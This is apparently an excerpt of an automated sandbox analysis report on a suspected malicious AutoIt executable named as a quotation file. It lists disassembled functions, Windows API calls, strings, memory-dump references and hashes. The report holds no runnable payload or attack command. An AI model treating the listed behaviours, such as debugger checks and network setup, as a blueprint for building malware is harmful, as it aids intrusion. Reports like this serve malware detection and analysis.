                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0015365C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$DestroyMove
                                                                                      • String ID: static
                                                                                      • API String ID: 2139405536-2160076837
                                                                                      • Opcode ID: 61eb2e8f40b461d59de9f0ce001fcbd2a9dc15ba4997a9938c80d2b60b543017
                                                                                      • Instruction ID: c6f39ef7acc13139873eebce04692700a3a61c6ceb52cc5bc3c067ccae055ba4
                                                                                      • Opcode Fuzzy Hash: 61eb2e8f40b461d59de9f0ce001fcbd2a9dc15ba4997a9938c80d2b60b543017
                                                                                      • Instruction Fuzzy Hash: EF317A71110604AEDB109F28D880EFB73A9FF88761F10961DF8B59B290DB31A9869760
                                                                                      Function 00154537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0015461F
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00154634
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: '
                                                                                      • API String ID: 3850602802-1997036262
                                                                                      • Opcode ID: 7fcfe72eb8cce06ef911cc510c994c06f78d5721caecdbc8de31160c7b98bb0a
                                                                                      • Instruction ID: 2e43ca9b1203facc0503bcc1d06375fa905289b2da9dc896bb1377f2a36fa5f0
                                                                                      • Opcode Fuzzy Hash: 7fcfe72eb8cce06ef911cc510c994c06f78d5721caecdbc8de31160c7b98bb0a
                                                                                      • Instruction Fuzzy Hash: 6D311674A0130AEFDB14CFA9C990BDA7BB5FB09305F10406AED14AB341E770A985CF90
                                                                                      Function 0014304E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0014335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00143077,?,?), ref: 00143378
                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0014307A
                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00143106
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                      • String ID: 255.255.255.255
                                                                                      • API String ID: 2496851823-2422070025
                                                                                      • Opcode ID: 501d7f57d64639b8abfb233bef6e7deb496c7e982dab56119ad0fea881e2e220
                                                                                      • Instruction ID: a4e3dd74fed773adbd3ca7eebdfeab234d7cae1586d240215074856e37dda9e0
                                                                                      • Opcode Fuzzy Hash: 501d7f57d64639b8abfb233bef6e7deb496c7e982dab56119ad0fea881e2e220
                                                                                      • Instruction Fuzzy Hash: 5B31D335200301DFDB14CF68C585EAA77E0EF54318F258199E9259B7A2DB72EE45C760
                                                                                      Function 001531EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0015327C
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00153287
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: Combobox
                                                                                      • API String ID: 3850602802-2096851135
                                                                                      • Opcode ID: 9a247d441a60a5547de56ed437399b734c5015ca05fe7a2111df6b186ab3fda9
                                                                                      • Instruction ID: 45f4be2c4ef013517de6c0e189b89fecc169478a8b5c004bcb99ea0d336640dd
                                                                                      • Opcode Fuzzy Hash: 9a247d441a60a5547de56ed437399b734c5015ca05fe7a2111df6b186ab3fda9
                                                                                      • Instruction Fuzzy Hash: 7A11B271300608BFEF259F54DC80EFB376AEB943A5F104129F938AB290D7319D959760
                                                                                      Function 00153710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000C604C
                                                                                        • Part of subcall function 000C600E: GetStockObject.GDI32(00000011), ref: 000C6060
                                                                                        • Part of subcall function 000C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000C606A
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0015377A
                                                                                      • GetSysColor.USER32(00000012), ref: 00153794
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                      • String ID: static
                                                                                      • API String ID: 1983116058-2160076837
                                                                                      • Opcode ID: 521ad57226d8a94aad1ecf84798a4b8b519991dd7ebefc47e2353176ba285585
                                                                                      • Instruction ID: bb44183cfedf7894bee1570878b5663cfd9ad8706f2a466a09a1775c61e473ab
                                                                                      • Opcode Fuzzy Hash: 521ad57226d8a94aad1ecf84798a4b8b519991dd7ebefc47e2353176ba285585
                                                                                      • Instruction Fuzzy Hash: B11159B2A1020AEFDB00DFA8CC45EEA7BB8FB08345F004514FD65E7250E735E8559B50
                                                                                      Function 0013CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0013CD7D
                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0013CDA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$OpenOption
                                                                                      • String ID: <local>
                                                                                      • API String ID: 942729171-4266983199
                                                                                      • Opcode ID: e6b5e2c621bd1fd984527b197a919a8a5bd24e59ea644c76b3f57ccdf2ef7cd8
                                                                                      • Instruction ID: ee290d228ee05edcdbb6aa1e288183b14e8bf88a2a9ae16061f54ade5f1a08a4
                                                                                      • Opcode Fuzzy Hash: e6b5e2c621bd1fd984527b197a919a8a5bd24e59ea644c76b3f57ccdf2ef7cd8
                                                                                      • Instruction Fuzzy Hash: 7D11C275205631BAD7384FA68C49EE7BEACEF127A4F00422AB109A7080D7709940D7F0
                                                                                      Function 00153429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 001534AB
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001534BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                      • String ID: edit
                                                                                      • API String ID: 2978978980-2167791130
                                                                                      • Opcode ID: 30f2651b59b558c6f953a82a7177b2363e70cd088670b06efc3bbe9e526064d3
                                                                                      • Instruction ID: 5beccc9d688042092cdec4c695868b6844016ac3140560ec16448efe1616add5
                                                                                      • Opcode Fuzzy Hash: 30f2651b59b558c6f953a82a7177b2363e70cd088670b06efc3bbe9e526064d3
                                                                                      • Instruction Fuzzy Hash: D7116D71100208EFEB124E64DC44AEB376AEB153B5F504724FD719B1D0C771DD999750
                                                                                      Function 00121CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00121D4C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 3678867486-1403004172
                                                                                      • Opcode ID: ba0f74c944c152b7c4e8ac2413b45e3f5a899363919bf326e6030f56304ca1cb
                                                                                      • Instruction ID: aa5358293a4df2c7745149b34660b30f2803a207fc7e4139105acb24b16f1885
                                                                                      • Opcode Fuzzy Hash: ba0f74c944c152b7c4e8ac2413b45e3f5a899363919bf326e6030f56304ca1cb
                                                                                      • Instruction Fuzzy Hash: 8C01D875601228FBCB08EFE4EC59DFE7769EB66350B44091AF832573C2EB3059288760
                                                                                      Function 00121BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00121C46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 3678867486-1403004172
                                                                                      • Opcode ID: 7d12105283d3ef7ada983e907850633ab0d256fec9ff24f05d6ce34548604f56
                                                                                      • Instruction ID: 3865505470f60baca1d3fd0afd6397d4ee4423f644069c3e7eff138c64121e2d
                                                                                      • Opcode Fuzzy Hash: 7d12105283d3ef7ada983e907850633ab0d256fec9ff24f05d6ce34548604f56
                                                                                      • Instruction Fuzzy Hash: 1F0167756811187BCB18FB90E956EFF77A99B25340F140019A416772C2EB249F3C87B5
                                                                                      Function 00121C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00121CC8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 3678867486-1403004172
                                                                                      • Opcode ID: e08e11b215195d62e760495ac1e1a301e810f25ea35dc5b11eb81643b2220e97
                                                                                      • Instruction ID: 7f4740ebbab7bd4f1c9f65ac77f444f3086315226b7e81e964e64167b707a798
                                                                                      • Opcode Fuzzy Hash: e08e11b215195d62e760495ac1e1a301e810f25ea35dc5b11eb81643b2220e97
                                                                                      • Instruction Fuzzy Hash: AA01D67568022877CB04FBA0DA56EFE77A99B31340F540029B81273282EB209F38C7B1
                                                                                      Function 00121D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00121DD3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 3678867486-1403004172
                                                                                      • Opcode ID: 6e87fb6a26dfb9950ba024ec428052cdcbf942f9d79cc4af0d3393a0bcbfe1fa
                                                                                      • Instruction ID: 3a26d6819d5d38b8a0739aa145ffdbb171f5be3535e7b42b8a82c896d23fdeb9
                                                                                      • Opcode Fuzzy Hash: 6e87fb6a26dfb9950ba024ec428052cdcbf942f9d79cc4af0d3393a0bcbfe1fa
                                                                                      • Instruction Fuzzy Hash: 58F0A971A41228B7D714FBE4DC5AFFE7768AB21350F440919B432672C2DB605A288660
                                                                                      Function 00120B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00120B23
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                      • API String ID: 2030045667-4017498283
                                                                                      • Opcode ID: 84c3bdf677e0da5b7c17cb71f3be10cd58c97f791f4e6e0c43ac4760eb23bd5a
                                                                                      • Instruction ID: b497d935ceefffc428ef07f9e164a95eecf8f1c96e060d0721c1ec1b944a6195
                                                                                      • Opcode Fuzzy Hash: 84c3bdf677e0da5b7c17cb71f3be10cd58c97f791f4e6e0c43ac4760eb23bd5a
                                                                                      • Instruction Fuzzy Hash: 65E0D8312443186ED2203B957C03FC97B85CF09F55F10446BFB58695C38BE2259046E9
                                                                                      Function 000E0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 000DF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000E0D71,?,?,?,000C100A), ref: 000DF7CE
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,000C100A), ref: 000E0D75
                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000C100A), ref: 000E0D84
                                                                                      Strings
                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000E0D7F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                      • API String ID: 55579361-631824599
                                                                                      • Opcode ID: 156779dc952e715e7b1003198834865cce243b7c3e435bab9b8b8eee3315e589
                                                                                      • Instruction ID: 08ab6df9a05a67394b15aa1910d59a637a69fed563120ebcd7b97bef85a15c3b
                                                                                      • Opcode Fuzzy Hash: 156779dc952e715e7b1003198834865cce243b7c3e435bab9b8b8eee3315e589
                                                                                      • Instruction Fuzzy Hash: 5EE06D74204341CFD3609FB9D8087967BE0EB00745F01892DE892DAA52DBF5E4C8CBA1
                                                                                      Function 00133017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0013302F
                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00133044
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Temp$FileNamePath
                                                                                      • String ID: aut
                                                                                      • API String ID: 3285503233-3010740371
                                                                                      • Opcode ID: bb0a4b263bd1f94c1ab6597c5797734549a94ebdea0d5f6888f685b8c736f158
                                                                                      • Instruction ID: cc353d65736244ba903f87a252715e13502367cb71728f32843b77112e07f335
                                                                                      • Opcode Fuzzy Hash: bb0a4b263bd1f94c1ab6597c5797734549a94ebdea0d5f6888f685b8c736f158
                                                                                      • Instruction Fuzzy Hash: 13D05E72500328ABDA20ABA4AC4EFCB7A7CDB04751F0002A1B655E6491EAB09A84CBD0
                                                                                      Function 0011D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime
                                                                                      • String ID: %.3d$X64
                                                                                      • API String ID: 481472006-1077770165
                                                                                      • Opcode ID: 0d8d623c6b9dd0b18be798a3fc7de17b52d25feff83a3d294fed470b0952ee59
                                                                                      • Instruction ID: eb8bce1e9d741ea56f71f1d972f71fec7e4d409eb0fa8694b2249e15763d7e85
                                                                                      • Opcode Fuzzy Hash: 0d8d623c6b9dd0b18be798a3fc7de17b52d25feff83a3d294fed470b0952ee59
                                                                                      • Instruction Fuzzy Hash: 8AD01261808219E9CB5C96D0EC459F9B37CFB19341F618473F81791040E734D5886B62
                                                                                      Function 00152322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0015232C
                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0015233F
                                                                                        • Part of subcall function 0012E97B: Sleep.KERNEL32 ref: 0012E9F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      • Opcode ID: 1935afc4de01c3fdccfe32bc1e980a891f704fc0e011dea36defebf1d46fa746
